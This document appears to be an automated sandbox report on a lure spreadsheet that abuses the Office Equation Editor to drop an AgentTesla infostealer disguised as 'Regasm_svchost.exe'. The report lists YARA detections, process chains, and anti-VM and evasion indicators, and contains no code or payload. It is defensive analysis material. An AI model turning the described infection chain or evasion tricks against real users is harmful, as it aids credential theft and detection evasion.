Source: 6.0.Regasm_svchost.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6FDDE178u002d8CC0u002d48F2u002d916Fu002d3E2DAE062187u007d/u0034CAF38F2u002d454Fu002d4211u002dA62Cu002d7FB6FD0C5EE8.cs Large array initialization: .cctor: array initializer size 11646
Yara signature match
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Detected potential crypto function
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_001D7060 5_2_001D7060
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_001DEDF0 5_2_001DEDF0
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A40048 5_2_00A40048
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A40024 5_2_00A40024
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A46B98 5_2_00A46B98
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A411E8 5_2_00A411E8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A411D9 5_2_00A411D9
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D42A0 6_2_003D42A0
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D4EB8 6_2_003D4EB8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003DDED8 6_2_003DDED8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003DCA48 6_2_003DCA48
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D45E8 6_2_003D45E8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062E839 6_2_0062E839
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062ACE8 6_2_0062ACE8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062D4F8 6_2_0062D4F8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00624950 6_2_00624950
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062C788 6_2_0062C788
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00627B98 6_2_00627B98
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062F0E8 6_2_0062F0E8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00625102 6_2_00625102
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00660468 6_2_00660468
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: mon[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Regasm_svchost.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Quotation - Optical Eyeglasses.xlsx Virustotal: Detection: 35%
Source: Quotation - Optical Eyeglasses.xlsx ReversingLabs: Detection: 31%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"
Source: C:\Users\Public\Regasm_svchost.exe Process created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe" Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Quotation - Optical Eyeglasses.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR692D.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/23@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A44FB3 push ebp; ret 5_2_00A44FB9
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D03E2 pushfd ; retf 0017h 6_2_003D0421
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D2591 pushfd ; retf 0017h 6_2_003D2595
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00627328 push eax; retf 6_2_006273B1
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_006273C0 pushad ; retf 6_2_00627401
Source: initial sample Static PE information: section name: .text entropy: 7.741618830897132
Source: initial sample Static PE information: section name: .text entropy: 7.741618830897132
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Regasm_svchost.exe Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0517
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Regasm_svchost.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Regasm_svchost.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Regasm_svchost.exe, 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Regasm_svchost.exe, 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2056 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 2820 Thread sleep time: -45877s >= -30000s Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 2956 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 1412 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436 Thread sleep time: -510000s >= -30000s Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 2088 Thread sleep count: 9428 > 30 Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436 Thread sleep count: 53 > 30 Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\Regasm_svchost.exe Window / User API: threadDelayed 9428 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\Regasm_svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 45877 Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: EQNEDT32.EXE, 00000002.00000002.980447357.00000000005DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[I
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
